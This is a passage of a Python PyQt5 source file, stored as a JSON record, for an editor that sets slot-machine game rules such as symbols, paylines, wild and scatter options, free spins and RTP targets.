+{"seq_id":"4724915796","text":"# -*- coding: utf-8 -*-\nimport sys\nimport json\nimport ntpath\nfrom PyQt5 import QtWidgets, QtGui, QtCore, sip\n\n# counts\ncount = 0\ncount_lines = 0\ncount_tabs = 1\n\n# colors\ndefault_color = QtGui.QColor(220, 220, 220)\nwild_color = QtGui.QColor(255, 229, 100)\nscatter_color = QtGui.QColor(120, 237, 255)\nwildnscatter_color = QtGui.QColor(221, 172, 225)\n\n\ndef path_leaf(path):\n head, tail = ntpath.split(path)\n return tail or ntpath.basename(head)\n\n\ndef isint(value):\n try:\n int(value)\n return int(value)\n except ValueError:\n return -1\n\n\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef float_validate(self, bot, top):\n sender = self.sender()\n if str(sender.text()) != '':\n try:\n if not bot <= float(sender.text()) <= top:\n raise ValueError\n sender.setStyleSheet('')\n except ValueError:\n sender.setStyleSheet('QLineEdit {background-color: #f6989d;}')\n else:\n sender.setStyleSheet('')\n\n\ndef int_validate(self, bot, top):\n sender = self.sender()\n if str(sender.text()) != '':\n try:\n if not bot <= int(sender.text()) <= top:\n raise ValueError\n sender.setStyleSheet('')\n except ValueError:\n sender.setStyleSheet('QLineEdit {background-color: #f6989d;}')\n else:\n sender.setStyleSheet('')\n\n\ndef string_validate(self):\n sender = self.sender()\n if str(sender.text()) == '':\n sender.setStyleSheet('QLineEdit {background-color: #f6989d;}')\n else:\n sender.setStyleSheet('')\n\n\nclass Aesthetic(QtWidgets.QWidget):\n def __init__(self, obj):\n 
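The short Huffman solution included above (10542.py) derives each symbol's code length by building an explicit tree and walking it. An alternative sketch of the same algorithm using heapq that tracks only code lengths; the weights in the example are the textbook 5/9/12/13/16/45 case, not taken from the problem's input.

import heapq

def huffman_code_lengths(weights):
    depth = [0] * len(weights)                # depth[i] = code length of symbol i
    heap = [(w, [i]) for i, w in enumerate(weights)]
    heapq.heapify(heap)
    while len(heap) > 1:
        wa, ia = heapq.heappop(heap)          # two lightest subtrees
        wb, ib = heapq.heappop(heap)
        for i in ia + ib:                     # every leaf below them gains one bit
            depth[i] += 1
        heapq.heappush(heap, (wa + wb, ia + ib))
    return depth

print(huffman_code_lengths([5, 9, 12, 13, 16, 45]))  # [4, 4, 3, 3, 3, 1]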
super(Aesthetic, self).__init__()\n\n fon = QtWidgets.QHBoxLayout()\n fon.addWidget(obj)\n fon.addStretch(40)\n self.setLayout(fon)\n\n\nclass LabeledLine(QtWidgets.QWidget):\n def __init__(self, name, color):\n super(LabeledLine, self).__init__()\n\n self.fon = QtWidgets.QHBoxLayout()\n self.label = QtWidgets.QLabel(str(name))\n self.line = QtWidgets.QLineEdit()\n\n self.init_ui(color)\n\n def init_ui(self, color):\n self.fon.setSpacing(0)\n self.fon.addWidget(self.label)\n self.fon.addWidget(self.line)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n\n self.label.setStyleSheet('QLabel {border-left: 1px solid black; border-top: 1px solid black; border-right: none; border-bottom: 1px solid black}')\n self.label.setAutoFillBackground(True)\n p = self.label.palette()\n p.setColor(self.label.backgroundRole(), color)\n self.label.setPalette(p)\n\n self.setLayout(self.fon)\n\n\nclass LineEdits(QtWidgets.QWidget):\n def __init__(self, length, width, bot, top, height=None, space=None, double=None):\n super(LineEdits, self).__init__()\n\n self.fon = QtWidgets.QHBoxLayout()\n self.lines = []\n\n self.init_ui(length, width, bot, top, height, space, double)\n\n def init_ui(self, length, width, bot, top, height, space, double):\n for i in range(length):\n line = QtWidgets.QLineEdit()\n if double is None:\n line.textChanged.connect(lambda: self.int_validate(bot, top))\n else:\n line.textChanged.connect(lambda: self.float_validate(bot, top))\n self.lines.append(line)\n self.lines[i].setFixedWidth(width)\n if height is not None:\n self.lines[i].setFixedHeight(height)\n self.fon.addWidget(self.lines[i])\n if space is not None:\n self.fon.setSpacing(space)\n self.fon.addStretch(40)\n\n self.setLayout(self.fon)\n\n int_validate = int_validate\n float_validate = float_validate\n\n def collect_info(self):\n info = []\n for i in range(len(self.lines)):\n if isint(str(self.lines[i].text())) > 0:\n info.append([i + 1, int(str(self.lines[i].text()))])\n return info\n\n def arrange_info(self):\n info = []\n for i in range(len(self.lines)):\n if isint(str(self.lines[i].text())) > 0:\n info.append(int(str(self.lines[i].text())))\n else:\n return None\n return info\n\n def set_info(self, interim_info):\n for obj in interim_info:\n self.lines[obj[0] - 1].setText(str(obj[1]))\n\n def fill_info(self, interim_info):\n for i in range(len(interim_info)):\n self.lines[i].setText(str(interim_info[i]))\n\n\nclass SwitchButtons(QtWidgets.QWidget):\n def __init__(self, width, size):\n super(SwitchButtons, self).__init__()\n\n self.fon = QtWidgets.QHBoxLayout()\n self.buttons = []\n\n self.init_ui(width, size)\n\n def init_ui(self, width, size):\n for i in range(width):\n button = QtWidgets.QPushButton()\n button.setCheckable(True)\n\n button.setStyleSheet(\"QPushButton {background-color: #4CCD59; border: none;}\"\n \"QPushButton:pressed { background-color: #00A505 }\"\n \"QPushButton:focus { background-color: #4CCD59 }\"\n \"QPushButton:focus:pressed { background-color: #00A505 }\"\n \"QPushButton:hover { background-color: #27E83A }\")\n button.setIcon(QtGui.QIcon('icons/allowed.png'))\n button.clicked[bool].connect(self.toggle)\n self.buttons.append(button)\n self.buttons[i].setFixedWidth(size)\n self.buttons[i].setFixedHeight(24)\n self.fon.addWidget(self.buttons[i])\n self.fon.addStretch(40)\n\n self.setLayout(self.fon)\n\n def toggle(self, pressed):\n sender = self.sender()\n if pressed:\n sender.setStyleSheet(\"QPushButton {background-color: #EB6C6C; border: none;}\"\n \"QPushButton:pressed { background-color: #EB4848 
}\"\n \"QPushButton:focus { background-color: #EB6C6C }\"\n \"QPushButton:focus:pressed { background-color: #EB4848 }\"\n \"QPushButton:hover { background-color: #F97373 }\")\n sender.setIcon(QtGui.QIcon('icons/prohibited.png'))\n else:\n sender.setAutoFillBackground(True)\n sender.setStyleSheet(\"QPushButton {background-color: #4CCD59; border: none;}\"\n \"QPushButton:pressed { background-color: #00A505 }\"\n \"QPushButton:focus { background-color: #4CCD59 }\"\n \"QPushButton:focus:pressed { background-color: #00A505 }\"\n \"QPushButton:hover { background-color: #27E83A }\")\n sender.setIcon(QtGui.QIcon('icons/allowed.png'))\n\n def collect_info(self):\n info = []\n for i in range(len(self.buttons)):\n if not self.buttons[i].isChecked():\n info.append(i + 1)\n return info\n\n def set_info(self, interim_symbol_type):\n for i in range(len(self.buttons)):\n if i + 1 not in interim_symbol_type['position']:\n self.buttons[i].click()\n\n\nclass Wild(QtWidgets.QWidget):\n def __init__(self):\n super(Wild, self).__init__()\n\n self.fon = QtWidgets.QGridLayout()\n\n self.label_multiplier = QtWidgets.QLabel('multiplier')\n self.line_multiplier = QtWidgets.QLineEdit()\n\n self.label_substitute = QtWidgets.QLabel('substitute')\n self.line_substitute = QtWidgets.QLineEdit()\n\n self.label_expand = QtWidgets.QLabel('expand')\n self.checkbox_expand = QtWidgets.QCheckBox()\n\n self.init_ui()\n\n def init_ui(self):\n self.fon.setColumnStretch(2, 40)\n\n self.fon.addWidget(self.label_multiplier, 0, 0)\n self.fon.addWidget(self.line_multiplier, 0, 1)\n self.line_multiplier.setFixedWidth(40)\n self.line_multiplier.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon.addWidget(self.label_substitute, 1, 0)\n self.fon.addWidget(self.line_substitute, 1, 1)\n self.line_substitute.setFixedWidth(40)\n self.line_substitute.textChanged.connect(self.adjust)\n\n self.fon.addWidget(self.label_expand, 2, 0)\n self.fon.addWidget(self.checkbox_expand, 2, 1)\n self.setLayout(self.fon)\n\n def adjust(self):\n text = self.line_substitute.text()\n fm = self.line_substitute.fontMetrics()\n w = fm.boundingRect(text).width()\n self.line_substitute.setFixedWidth(max(w + 12, 40))\n\n float_validate = float_validate\n\n def collect_info(self):\n d = {}\n if isint(str(self.line_multiplier.text())) >= 0:\n d.update({'multiplier': int(str(self.line_multiplier.text()))})\n if self.checkbox_expand.checkState() == QtCore.Qt.Checked:\n d.update({'expand': True})\n words = str(self.line_substitute.text()).split('; ')\n if words is not None and words != ['']:\n d.update({'substitute': words})\n return d\n\n def set_info(self, interim_symbol_type):\n if 'multiplier' in interim_symbol_type['wild']:\n self.line_multiplier.setText(str(interim_symbol_type['wild']['multiplier']))\n\n if 'expand' in interim_symbol_type['wild'] and interim_symbol_type['wild']['expand'] is True:\n self.checkbox_expand.setChecked(True)\n\n if 'substitute' in interim_symbol_type['wild']:\n self.line_substitute.setText('; '.join(interim_symbol_type['wild']['substitute']))\n\n\nclass Gametype(QtWidgets.QWidget):\n def __init__(self, type, width):\n super(Gametype, self).__init__()\n\n self.width = width\n\n self.fon_back = QtWidgets.QGridLayout()\n self.fon = QtWidgets.QGridLayout()\n\n for i in range(7):\n self.fon.setRowStretch(i, 1)\n\n self.fon.setRowStretch(7, 400)\n\n self.fon_cancel = QtWidgets.QHBoxLayout()\n\n self.label = QtWidgets.QLabel(type)\n self.label_direction = QtWidgets.QLabel('direction')\n self.line_direction = 
QtWidgets.QComboBox()\n self.line_direction.setFixedWidth(100)\n self.line_direction.addItems(['left', 'right', 'both', 'any'])\n\n self.label_position = QtWidgets.QLabel('position')\n self.buttons_position = SwitchButtons(self.width, 40)\n\n self.label_scatter = QtWidgets.QLabel('scatter')\n self.checkbox_scatter = QtWidgets.QCheckBox()\n\n self.label_freespins = QtWidgets.QLabel('freespins')\n self.line_freespins = None\n\n self.label_wild = QtWidgets.QLabel('wild')\n self.checkbox_wild = QtWidgets.QCheckBox()\n\n self.wild = None\n\n self.frame = QtWidgets.QFrame()\n\n self.init_ui()\n\n def init_ui(self):\n self.fon.addWidget(self.label_direction, 1, 0)\n self.fon.addWidget(Aesthetic(self.line_direction), 1, 1)\n\n self.fon.addWidget(self.label_position, 2, 0)\n self.fon.addWidget(self.buttons_position, 2, 1)\n\n self.fon.addWidget(self.label_scatter, 3, 0)\n self.fon.addWidget(Aesthetic(self.checkbox_scatter), 3, 1)\n self.checkbox_scatter.stateChanged.connect(self.scatter_check)\n\n self.fon.addWidget(self.label_wild, 5, 0)\n self.fon.addWidget(Aesthetic(self.checkbox_wild), 5, 1)\n self.checkbox_wild.stateChanged.connect(self.wild_check)\n\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.frame.setLayout(self.fon)\n\n self.fon_back.addWidget(self.frame)\n\n self.fon_cancel.addStretch(400)\n self.fon.addLayout(self.fon_cancel, 8, 1)\n\n self.checkbox_wild.stateChanged.connect(self.change_colour)\n self.checkbox_scatter.stateChanged.connect(self.change_colour)\n\n self.setLayout(self.fon_back)\n\n def scatter_check(self, state):\n if state == QtCore.Qt.Checked:\n self.fon.addWidget(self.label_freespins, 4, 0)\n self.line_freespins = LineEdits(self.width, 40, 0, sys.maxsize, None, None, True)\n self.fon.addWidget(self.line_freespins, 4, 1)\n else:\n self.fon.removeWidget(self.label_freespins)\n sip.delete(self.label_freespins)\n self.label_freespins = QtWidgets.QLabel('freespins')\n\n self.fon.removeWidget(self.line_freespins)\n sip.delete(self.line_freespins)\n self.line_freespins = None\n\n def wild_check(self, state):\n if state == QtCore.Qt.Checked:\n self.wild = Wild()\n self.fon.addWidget(self.wild, 6, 0, 1, 2)\n else:\n self.fon.removeWidget(self.wild)\n sip.delete(self.wild)\n self.wild = None\n\n def change_colour(self):\n global default_color, wild_color, scatter_color, wildnscatter_color\n self.frame.setAutoFillBackground(True)\n p = self.frame.palette()\n if self.checkbox_wild.checkState() == QtCore.Qt.Checked and self.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n p.setColor(self.frame.backgroundRole(), wildnscatter_color)\n self.frame.setPalette(p)\n\n elif self.checkbox_wild.checkState() == QtCore.Qt.Checked:\n p.setColor(self.frame.backgroundRole(), wild_color)\n self.frame.setPalette(p)\n\n elif self.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n p.setColor(self.frame.backgroundRole(), scatter_color)\n self.frame.setPalette(p)\n\n else:\n p.setColor(self.frame.backgroundRole(), default_color)\n self.frame.setPalette(p)\n\n def collect_info(self):\n d = {}\n d.update({'direction': str(self.line_direction.currentText())})\n d.update({'position': self.buttons_position.collect_info()})\n if self.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n d.update({'scatter': self.line_freespins.collect_info()})\n if self.checkbox_wild.checkState() == QtCore.Qt.Checked:\n d.update({'wild': self.wild.collect_info()})\n return d\n\n def set_info(self, interim_symbol_type):\n if 'direction' in 
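The position toggles used above (SwitchButtons) are ordinary checkable QPushButtons whose stylesheet and icon are swapped in the clicked handler. A stripped-down standalone version of that pattern; the icon files are omitted and only the colour swap is shown.

import sys
from PyQt5 import QtWidgets

ALLOWED = "QPushButton {background-color: #4CCD59; border: none;}"
PROHIBITED = "QPushButton {background-color: #EB6C6C; border: none;}"

def toggled(pressed, button):
    # checked means the position is prohibited, unchecked means it is allowed
    button.setStyleSheet(PROHIBITED if pressed else ALLOWED)

if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QWidget()
    layout = QtWidgets.QHBoxLayout(window)
    for _ in range(5):
        button = QtWidgets.QPushButton()
        button.setCheckable(True)
        button.setFixedSize(40, 24)
        button.setStyleSheet(ALLOWED)
        button.clicked[bool].connect(lambda pressed, b=button: toggled(pressed, b))
        layout.addWidget(button)
    window.show()
    sys.exit(app.exec_())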
interim_symbol_type:\n index = self.line_direction.findText(interim_symbol_type['direction'], QtCore.Qt.MatchFixedString)\n if index >= 0:\n self.line_direction.setCurrentIndex(index)\n\n if 'position' in interim_symbol_type:\n self.buttons_position.set_info(interim_symbol_type)\n\n if 'scatter' in interim_symbol_type:\n self.checkbox_scatter.setCheckState(QtCore.Qt.Checked)\n self.line_freespins.set_info(interim_symbol_type['scatter'])\n\n if 'wild' in interim_symbol_type:\n self.checkbox_wild.setCheckState(QtCore.Qt.Checked)\n self.wild.set_info(interim_symbol_type)\n\n\nclass Symbol(QtWidgets.QWidget):\n def __init__(self, count, width):\n super(Symbol, self).__init__()\n\n self.frame_symbol = QtWidgets.QFrame()\n self.fon_back = QtWidgets.QVBoxLayout()\n self.fon_symbol = QtWidgets.QVBoxLayout()\n self.fon_type = QtWidgets.QGridLayout()\n self.border = QtWidgets.QLabel(' ')\n self.label_base = QtWidgets.QLabel('base game')\n self.label_free = QtWidgets.QLabel('free game')\n\n self.fon_name = QtWidgets.QHBoxLayout()\n self.label_name = QtWidgets.QLabel('name ')\n self.line_name = QtWidgets.QLineEdit('symbol_' + str(count + 1))\n\n self.fon_payment = QtWidgets.QHBoxLayout()\n self.label_payment = QtWidgets.QLabel('payment')\n self.line_payment = None\n\n self.width = width\n self.base = Gametype('base game', self.width)\n self.free = None\n\n self.fon_button = QtWidgets.QVBoxLayout()\n self.frame_button = QtWidgets.QFrame()\n self.button_free = QtWidgets.QPushButton()\n self.button_free.setIcon(QtGui.QIcon('icons/edit.png'))\n self.button_state = True\n\n self.init_ui()\n\n def init_ui(self):\n self.fon_name.addWidget(self.label_name)\n self.line_name.setFixedWidth(225)\n self.fon_name.addWidget(Aesthetic(self.line_name))\n self.line_name.textChanged.connect(self.string_validate)\n\n self.fon_payment.addWidget(self.label_payment)\n self.line_payment = LineEdits(self.width, 40, 0, sys.maxsize, None, None, True)\n self.fon_payment.addWidget(self.line_payment)\n\n self.fon_symbol.addLayout(self.fon_name)\n self.fon_symbol.addLayout(self.fon_payment)\n self.fon_symbol.addLayout(self.fon_type)\n\n self.fon_type.addWidget(self.base, 0, 0, 1, 1)\n\n self.fon_type.addWidget(self.frame_button, 0, 2)\n self.frame_button.setLayout(self.fon_button)\n self.frame_button.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.frame_button.setContentsMargins(0, 0, 0, 0)\n self.fon_button.addWidget(self.button_free)\n self.button_free.clicked.connect(self.button_free_clicked)\n self.button_free.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n self.button_free.setToolTip('Edit free game properties')\n\n self.fon_type.setColumnStretch(0, 40)\n\n self.fon_type.setHorizontalSpacing(0)\n\n self.fon_symbol.addWidget(self.border)\n\n #self.frame_symbol.setLineWidth(2)\n self.frame_symbol.setFrameShape(QtWidgets.QFrame.WinPanel)\n self.frame_symbol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_symbol.setAutoFillBackground(True)\n p = self.frame_symbol.palette()\n p.setColor(self.frame_symbol.backgroundRole(), QtGui.QColor(220, 220, 220))\n self.frame_symbol.setPalette(p)\n\n self.frame_symbol.setLayout(self.fon_symbol)\n self.fon_back.addWidget(self.frame_symbol)\n self.setLayout(self.fon_back)\n\n def button_free_clicked(self):\n if self.button_state:\n self.fon_type.setColumnStretch(1, 40)\n self.free = Gametype('free game', self.width)\n self.base.fon.addWidget(self.base.label, 0, 0, 1, 2)\n self.base.label.setAlignment(QtCore.Qt.AlignCenter)\n 
self.free.fon.addWidget(self.free.label, 0, 0, 1, 2)\n self.free.label.setAlignment(QtCore.Qt.AlignCenter)\n self.fon_type.addWidget(self.free, 0, 1, 1, 1)\n self.button_free.setIcon(QtGui.QIcon('icons/noedit.png'))\n self.button_free.setToolTip('Cancel editing')\n self.free.fon_cancel.addWidget(self.button_free)\n self.button_state = False\n\n else:\n self.fon_type.setColumnStretch(1, 1)\n self.fon_button.addWidget(self.button_free)\n\n self.base.fon.removeWidget(self.base.label)\n sip.delete(self.base.label)\n self.base.label = QtWidgets.QLabel('base game')\n\n self.free.fon.removeWidget(self.free.label)\n sip.delete(self.free.label)\n self.free.label = QtWidgets.QLabel('free game')\n\n self.fon_type.removeWidget(self.free)\n sip.delete(self.free)\n self.free = None\n self.button_free.setIcon(QtGui.QIcon('icons/edit.png'))\n self.button_free.setToolTip('Edit free game properties')\n self.button_state = True\n\n string_validate = string_validate\n\n def collect_info(self):\n d = {}\n d.update({'name': str(self.line_name.text())})\n d.update({'payment': self.line_payment.collect_info()})\n d.update({'base': self.base.collect_info()})\n if self.free is not None:\n d.update({'free': self.free.collect_info()})\n return d\n\n def set_info(self, interim_symbol):\n self.line_name.setText(str(interim_symbol['name']))\n self.line_payment.set_info(interim_symbol['payment'])\n if 'base' in interim_symbol:\n self.base.set_info(interim_symbol['base'])\n if 'free' in interim_symbol:\n self.button_free_clicked()\n self.free.set_info(interim_symbol['free'])\n\n\nclass Window(QtWidgets.QWidget):\n def __init__(self):\n super(Window, self).__init__()\n\n self.fon_scroll = QtWidgets.QHBoxLayout()\n self.scroll = QtWidgets.QScrollArea()\n self.widget = QtWidgets.QWidget()\n self.fon = QtWidgets.QGridLayout()\n\n self.box_rules = QtWidgets.QGroupBox('Rules')\n self.fon_rules = QtWidgets.QGridLayout()\n\n self.box_param = QtWidgets.QGroupBox('Parameters')\n self.fon_param = QtWidgets.QGridLayout()\n\n self.box_frequency = QtWidgets.QGroupBox('Frequency')\n self.fon_frequency = QtWidgets.QGridLayout()\n\n self.button_switch = QtWidgets.QPushButton()\n self.button_switch.setIcon(QtGui.QIcon('icons/switch.png'))\n self.button_switch.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n self.button_switch.setFixedWidth(28)\n\n self.param_mode = True\n\n self.label_window = QtWidgets.QLabel('window')\n self.line_width = QtWidgets.QLineEdit('5')\n self.line_height = QtWidgets.QLineEdit('3')\n self.width = 5\n self.height = 3\n\n self.fon_window = QtWidgets.QHBoxLayout()\n\n self.label_symbol = QtWidgets.QLabel('symbols')\n self.frame_symbols = QtWidgets.QFrame()\n self.fon_symbols = QtWidgets.QVBoxLayout()\n self.grid_symbols = QtWidgets.QGridLayout()\n self.count_symbols = 0\n\n self.add_symbol = QtWidgets.QPushButton('Add symbol')\n\n self.symbols = []\n self.deleteButtons = []\n\n self.label_lines = QtWidgets.QLabel('lines')\n self.frame_lines = QtWidgets.QFrame()\n self.fon_lines = QtWidgets.QVBoxLayout()\n self.grid_lines = QtWidgets.QGridLayout()\n self.count_lines = 0\n\n self.add_line = QtWidgets.QPushButton('Add line')\n\n self.lines = []\n self.deleteLines = []\n\n self.label_freemultiplier = QtWidgets.QLabel('free multiplier')\n self.line_freemultiplier = QtWidgets.QLineEdit()\n\n self.label_distance = QtWidgets.QLabel('distance')\n self.line_distance = QtWidgets.QLineEdit()\n\n self.label_rtp = QtWidgets.QLabel('RTP')\n self.line_rtp = QtWidgets.QLineEdit()\n 
self.line_rtp_error = QtWidgets.QLineEdit()\n\n self.label_volatility = QtWidgets.QLabel('volatility ')\n self.line_volatility = QtWidgets.QLineEdit()\n self.line_volatility_error = QtWidgets.QLineEdit()\n\n self.label_hitrate = QtWidgets.QLabel('hitrate')\n self.line_hitrate = QtWidgets.QLineEdit()\n self.line_hitrate_error = QtWidgets.QLineEdit()\n\n self.label_baseRTP = QtWidgets.QLabel('base RTP')\n self.line_baseRTP = QtWidgets.QLineEdit()\n self.line_baseRTP_error = QtWidgets.QLineEdit()\n\n self.frequency = []\n\n self.init_ui()\n\n def init_ui(self):\n #self.fon.setColumnStretch(0, 4)\n #self.fon.setColumnStretch(1, 4)\n self.fon.setRowStretch(0, 4)\n\n self.fon_rules.setRowStretch(2, 40)\n self.fon_rules.setRowStretch(4, 40)\n\n self.fon_rules.setColumnStretch(4, 4)\n self.fon_rules.setColumnStretch(5, 4)\n\n self.fon_param.setColumnStretch(3, 4)\n\n self.fon_rules.addWidget(self.label_window, 0, 0)\n\n self.fon_rules.addWidget(self.line_width, 0, 1)\n self.line_width.setFixedWidth(80)\n self.fon_rules.addWidget(self.line_height, 0, 2)\n self.line_height.setFixedWidth(80)\n\n self.line_width.textChanged.connect(self.width_changed)\n self.line_width.textChanged.connect(lambda: self.int_validate(1, sys.maxsize))\n self.line_height.textChanged.connect(self.height_changed)\n self.line_height.textChanged.connect(lambda: self.int_validate(1, sys.maxsize))\n\n # symbols\n self.grid_symbols.setHorizontalSpacing(0)\n\n self.fon_rules.addWidget(self.label_symbol, 1, 0)\n self.fon_rules.addWidget(self.frame_symbols, 1, 1, 2, 4)\n self.frame_symbols.setLayout(self.fon_symbols)\n self.frame_symbols.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_symbols.setFrameShadow(QtWidgets.QFrame.Plain)\n self.grid_lines.setVerticalSpacing(0)\n\n self.fon_symbols.addLayout(self.grid_symbols)\n self.fon_symbols.setStretchFactor(self.grid_symbols, 40)\n self.fon_symbols.addWidget(self.add_symbol)\n\n self.add_symbol.clicked.connect(lambda: self.click_add_symbol())\n\n # lines\n self.grid_lines.setHorizontalSpacing(0)\n\n self.fon_rules.addWidget(self.label_lines, 3, 0)\n self.fon_rules.addWidget(self.frame_lines, 3, 1, 2, 3)\n self.frame_lines.setLayout(self.fon_lines)\n self.frame_lines.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_lines.setFrameShadow(QtWidgets.QFrame.Plain)\n\n self.fon_lines.addLayout(self.grid_lines)\n self.fon_lines.setStretchFactor(self.grid_lines, 40)\n self.fon_lines.addWidget(self.add_line)\n\n self.add_line.clicked.connect(self.click_add_line)\n\n self.fon_rules.addWidget(self.label_freemultiplier, 5, 0)\n self.fon_rules.addWidget(self.line_freemultiplier, 5, 1, 1, 2)\n self.line_freemultiplier.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_rules.addWidget(self.label_distance, 6, 0)\n self.fon_rules.addWidget(self.line_distance, 6, 1, 1, 2)\n self.line_distance.textChanged.connect(lambda: self.int_validate(0, len(self.symbols)))\n\n self.fon_param.addWidget(self.label_rtp, 7, 0)\n self.fon_param.addWidget(self.line_rtp, 7, 1)\n self.line_rtp.setFixedWidth(80)\n self.fon_param.addWidget(self.line_rtp_error, 7, 2)\n self.line_rtp_error.setFixedWidth(80)\n self.line_rtp.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_rtp_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_param.addWidget(self.label_volatility, 8, 0)\n self.fon_param.addWidget(self.line_volatility, 8, 1)\n self.line_volatility.setFixedWidth(80)\n self.fon_param.addWidget(self.line_volatility_error, 8, 2)\n 
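Validation in this UI is reactive: each QLineEdit's textChanged signal is connected to a range check that colours the field red when the value is out of bounds, as in float_validate()/int_validate() above. A standalone sketch of that pattern; the bounds are illustrative.

import sys
from PyQt5 import QtWidgets

def make_validated_line(bot, top):
    line = QtWidgets.QLineEdit()
    def check():
        text = line.text()
        try:
            ok = text == "" or bot <= float(text) <= top
        except ValueError:
            ok = False
        line.setStyleSheet("" if ok else "QLineEdit {background-color: #f6989d;}")
    line.textChanged.connect(check)
    return line

if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QWidget()
    layout = QtWidgets.QVBoxLayout(window)
    layout.addWidget(make_validated_line(0, 100))  # e.g. a percentage field
    window.show()
    sys.exit(app.exec_())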
self.line_volatility_error.setFixedWidth(80)\n self.line_volatility.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_volatility_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_param.addWidget(self.label_hitrate, 9, 0)\n self.fon_param.addWidget(self.line_hitrate, 9, 1)\n self.line_hitrate.setFixedWidth(80)\n self.fon_param.addWidget(self.line_hitrate_error, 9, 2)\n self.line_hitrate_error.setFixedWidth(80)\n self.line_hitrate.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_hitrate_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_param.addWidget(self.label_baseRTP, 10, 0)\n self.fon_param.addWidget(self.line_baseRTP, 10, 1)\n self.line_baseRTP.setFixedWidth(80)\n self.fon_param.addWidget(self.line_baseRTP_error, 10, 2)\n self.line_baseRTP_error.setFixedWidth(80)\n self.line_baseRTP.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_baseRTP_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.button_switch.clicked.connect(self.switch_mode)\n\n self.box_rules.setLayout(self.fon_rules)\n self.box_param.setLayout(self.fon_param)\n self.box_frequency.setLayout(self.fon_frequency)\n\n self.fon.addWidget(self.box_rules, 0, 0, 1, 3)\n self.fon.addWidget(self.box_param, 1, 0)\n\n self.fon.addWidget(self.button_switch, 1, 2)\n\n self.widget.setLayout(self.fon)\n self.scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n self.scroll.setWidgetResizable(True)\n self.scroll.setWidget(self.widget)\n self.fon_scroll.addWidget(self.scroll)\n self.setLayout(self.fon_scroll)\n\n def click_add_symbol(self, opened=None):\n global default_color\n symbol = Symbol(self.count_symbols, self.width)\n self.symbols.append(symbol)\n\n button_delete = QtWidgets.QPushButton()\n button_delete.setIcon(QtGui.QIcon('icons/close.png'))\n button_delete.setToolTip('Delete symbol')\n button_delete.setFixedSize(28, 28)\n self.deleteButtons.append(button_delete)\n self.deleteButtons[-1].clicked.connect(self.click_delete_symbol)\n self.symbols[-1].fon_name.addWidget(self.deleteButtons[-1])\n self.grid_symbols.addWidget(self.symbols[-1], self.count_symbols, 0)\n\n self.count_symbols += 1\n\n self.line_distance.textChanged.emit(self.line_distance.text())\n\n freq = LabeledLine(str(self.symbols[-1].line_name.text()), default_color)\n self.frequency.append(freq)\n self.fon_frequency.addWidget(self.frequency[-1], 0, self.count_symbols)\n\n if opened is None:\n QtWidgets.QApplication.processEvents()\n QtCore.QTimer.singleShot(0, self.sup_add_symbol)\n\n def sup_add_symbol(self):\n x = self.symbols[-1].x()\n y = self.symbols[-1].y()\n width = self.symbols[-1].geometry().width()\n height = self.symbols[-1].geometry().height()\n\n self.add_symbol_anim = QtCore.QPropertyAnimation(self.symbols[-1], b\"geometry\")\n self.add_symbol_button_anim = QtCore.QPropertyAnimation(self.add_symbol, b\"geometry\")\n self.add_symbol_anim.setDuration(160)\n self.add_symbol_button_anim.setDuration(160)\n self.add_symbol_anim.setStartValue(QtCore.QRect(x, y, width, 0))\n self.add_symbol_button_anim.setStartValue(QtCore.QRect(self.add_symbol.x(), self.add_symbol.y() - height, self.add_symbol.width(), self.add_symbol.height()))\n self.add_symbol_anim.setEndValue(QtCore.QRect(x, y, width, height))\n self.add_symbol_button_anim.setEndValue(QtCore.QRect(self.add_symbol.x(), y + height, self.add_symbol.width(), self.add_symbol.height()))\n self.add_symbol_anim.start()\n 
self.add_symbol_button_anim.start()\n\n dist = 137 - self.geometry().height() + (y + height) + self.widget.pos().y()\n if dist > 0:\n scroll = self.scroll.verticalScrollBar()\n scroll.setSingleStep(10)\n for i in range(int(dist/10)):\n QtCore.QTimer.singleShot(10 * i, lambda: scroll.triggerAction(QtWidgets.QAbstractSlider.SliderSingleStepAdd))\n\n def click_delete_symbol(self):\n sender = self.sender()\n num = self.deleteButtons.index(sender)\n\n height = self.symbols[num].geometry().height()\n self.del_symbol_anim = QtCore.QPropertyAnimation(self.symbols[num], b'minimumHeight')\n self.del_symbol_anim.setDuration(160)\n self.del_symbol_anim.setStartValue(height)\n self.del_symbol_anim.setEndValue(0)\n self.del_symbol_anim.start()\n\n QtCore.QTimer.singleShot(160, lambda: self.sub_del_symbol(num))\n\n self.line_distance.textChanged.emit(self.line_distance.text())\n\n def sub_del_symbol(self, num):\n self.grid_symbols.removeWidget(self.symbols[num])\n sip.delete(self.symbols[num])\n del self.symbols[num]\n del self.deleteButtons[num]\n\n def click_add_line(self):\n line = LineEdits(self.width, 28, 1, self.height, 24, 0)\n self.lines.append(line)\n\n button_delete = QtWidgets.QPushButton()\n button_delete.setIcon(QtGui.QIcon('icons/close.png'))\n button_delete.setFixedSize(26, 